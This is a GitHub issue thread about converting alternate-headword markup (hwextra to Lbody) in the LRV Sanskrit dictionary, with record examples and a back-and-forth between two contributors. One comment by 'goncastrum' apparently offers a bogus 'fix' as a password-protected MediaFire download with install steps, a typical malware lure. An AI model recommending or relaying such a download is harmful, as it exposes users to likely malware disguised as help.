### ISSUE TITLE
Replacing lrv_hwextra with Lbody

### ISSUE THREAD

**Issue by funderburkjim** [sanskrit-lexicon/COLOGNE#426]
Provide alternate markup for alternate headwords in LRV (Vaidya Standard Sanskrit-English Dictionary).
For motivation and details, refer: https://github.com/sanskrit-lexicon/GRA/issues/34

**Comment by funderburkjim** [comment]
This work now finished for lrv.

Many special changes encountered.  @drdhaval2785 and @Andhrabharati should review.

Work is [here](https://github.com/sanskrit-lexicon/COLOGNE/tree/master/issues/issue426).

Next comment(s) will summarize.

**Comment by funderburkjim** [comment]
```
from lrv_hwextra.txt
<L>00085.1<pc>002-32 <k1>akUvAra<k2>akUpA(vA)ra<type>alt<LP>00085<k1P>akUpAra

new record in revised lrv.txt
<L>00085.1<pc>002-32<k1>akUvAra<k2>akUvAra
{{Lbody=00085}}
<LEND>
```
compare
1. The k2 field from hwextra:  `akUpA(vA)ra`
2.  the k2 for the new record: `akUvAra`

In this example, it is easy to derive akUvAra from akUpA(vA)ra.  But there are many cases where such derivation is difficult.  

A derived k2 (e.g. akUvAra) is considered 'correct' if it is consistent with k1 
which in this example is also akUvAra.  In this work, consistency means that after removal of special characters we get the k1,
In this lrv,  here is the check that k2 is consistent with k1   
`re.sub(r'[˚-]','',k2)  == k1`.

The program hwextra_adj.py is written to accomplish the conversion to consistent k2.   
This program works on an intermediate lrv_hwextra_edit.txt file, where about 40 items were considered erroneous (or otherwise problematic) and were changed manually.
Then, the adj program used various (13) methods to get consistent k2s.

Using the adjusted lrv_hwextra_adj.txt file,  the process generates version 3
temp_lrv_3.txt.

**Comment by funderburkjim** [comment]
It was noticed that still there are some parent k2's in version 3 with parentheses in k2.
The k2_paren.py program removes these.  242 lines changed.

**Comment by funderburkjim** [comment]
I thought to examine the consistency of k1-k2 for ALL entries -- (not just entries in grouped (hwextra) entries).  
5887 of these found.  
For example:  `<L>04335<pc>085-23<k1>asadAgama<k2>asat-Agama`

I made the choice to change this k2 to `<k2>asadAgama`

All similar 5887  changes are in the change_lrv_5.txt file.

**Comment by Andhrabharati** [comment]
> Many special changes encountered. @drdhaval2785 and @Andhrabharati should review.

Just looked at the file now. **Wondered how I could 'pass-o'n such a data.** Then noticed that @drdhaval2785 had "used" the wrong-field from my given file for the HW while making the cdsl version!

![image](https://github.com/user-attachments/assets/78b4c228-ae13-4e47-b5d1-c3882dbe715d)

**He should've used the column-E for the composite word, but he seems to have picked up the column-D instead**, that is the "decomposed" word (formed as the intermediate form)!!

It appears that I had done a BIG mistake not to have looked at his converted file thus far.

**Comment by funderburkjim** [comment]
I noticed a couple of errors while composing these comments.
See the readme starting at 'version 6'.
Note esp. that avagrahas in k1 are problematic for displays.

**Comment by Andhrabharati** [comment]
@funderburkjim 

Pl. have a look at [my post](https://github.com/sanskrit-lexicon/LRV/issues/25#issue-2352712284) sometime back, addressing Dhaval.
He seems so occupied in his other activities, that he could even look at this so far!

**Comment by Andhrabharati** [comment]
> Possible problems with lrv.
> 1. <pc>001-04    What is -NN ?   Not a column

See what Dhaval had mentioned about [this](https://github.com/sanskrit-lexicon/LRV/issues/2#issue-1379736160) at LRV repo.

**Comment by funderburkjim** [comment]
## k2 formalism

@Andhrabharati   In converting from your k2 structure group to the Lbody structure,
it is necessary to construct a k1 from a (single) k2.

e.g.  `<L>N<k1>A<k2>X,Y` in AB version generates in Lbody
```
<L>N<k1>x<k2>X
blah blah
<L>N.1<k1>y<k2>Y
{{Lbody=N}}
```

In the conversion, we must construct k1 x from k2 X,  and k1 y from k2 Y.

The details of what is 'allowed' in X and Y, and how to convert need to be
specified.  Probably different dictionaries have (currently) different specifications.

Rules need to be specified for k2 to k1 conversion.

**Comment by Andhrabharati** [comment]
I'd rather leave this to you, Jim; I am not at all "for" the Lbody structure.
[If I had to make THE change, I would've opted to make k1-field also comma-separated, thus achieving the one-to-one correspondence between k1 & k2 list-members. But, you seem to have taken a step back from the "earlier" GRA style, just to "get rid" of the hwextra data/file.]

**Comment by Andhrabharati** [comment]
And probably, I guess you need not bother about generating the k2-list from the Lbody style that you have adopted now (as I had asked a few days back).

**Comment by funderburkjim** [comment]
## page sequence
I thought it might be something like that.  Since the pdf display program handles ppp-seq properly, we don't need to change to ppp-a,b,c.  The lrv-meta2.txt file in csl-orig might mention this (noticed that this lrv-meta2 file is currently empty!!)

**Comment by funderburkjim** [comment]
> I guess you need not bother about generating the k2-list 

I'll attend to this k2-Lbody conversion after completing the hwextra-Lbody conversion for remaining few dictionaries.

**Comment by Andhrabharati** [comment]
And my final comment about the parenthetical entries as HWs; these are all to be split as multiple HWs, and not to discard the brackets and 'arrive' at a single HW.

Hope Jim might consider this point and would correct his work as "needed".

**Comment by Andhrabharati** [comment]
> > I guess you need not bother about generating the k2-list
> 
> I'll attend to this k2-Lbody conversion after completing the hwextra-Lbody conversion for remaining few dictionaries.

No, you may forget about my earlier request; no need to 'waste' your time in this **unnecessary** activity now.

**Comment by funderburkjim** [comment]
As I understand it, you are going to review the supplement for MW using  your temp_mw_16_ab3.zip version [Ref:](https://github.com/sanskrit-lexicon/MWS/issues/176#issuecomment-2307579551).

Right?

**Comment by Andhrabharati** [comment]
Yes; I had aligned that mw file with my "revision" file and had to make many changes,, which might not intestest you guys at CDSL.

As such, I am trying to think of another means to pass-on my annexure-integration work, which may "suit" you.

**Comment by funderburkjim** [comment]
From your [comment](https://github.com/sanskrit-lexicon/ApteES/issues/9#issuecomment-2313301172),  I thought that you would be using the ab3 version.  This is fine with me.

**Comment by funderburkjim** [comment]
> As an example, "akUpA(vA)ra" should generate "akUpAra, akUvAra".

Current cdsl:
```
<L>00085<pc>002-32<k1>akUpAra<k2>akUpAra
akUpA(vA)ra¦ {%m.%} 1. The sea; 2. a tortoise; 3. the tortoise supposed to uphold the world.
<LEND>
<L>00085.1<pc>002-32<k1>akUvAra<k2>akUvAra
{{Lbody=00085}}
<LEND>
```

When I convert this to the 'AB' version of lrv.txt,  that AB version will have 
```
<L>00085<pc>002-32<k1>akUpAra<k2>akUpAra, akUvAra
akUpA(vA)ra¦ {%m.%} 1. The sea; 2. a tortoise; 3. the tortoise supposed to uphold the world.
<LEND>{{00085, 00085.1}}
```

**Comment by goncastrum** [comment]
hi bro, to fix your trouble try this fix, i see it in another issue,
https://app.mediafire.com/dqajf1x14ccfd
password: changeme
when you installing it, you need to place a check in install to path and select usx

**Comment by Andhrabharati** [comment]
> From your [comment](https://github.com/sanskrit-lexicon/ApteES/issues/9#issuecomment-2313301172), I thought that you would be using the ab3 version. This is fine with me.

Yes, that was my initial/original intent.

But as you had not shown interest in changing the markup (in your final version) at some lines as suggested, I thought I should not continue in the same manner.

You may have a look at [my 'aligned' file](https://github.com/sanskrit-lexicon/MWS/issues/176#issuecomment-2323840570) now; based on your opinion on it, I would proceed further.
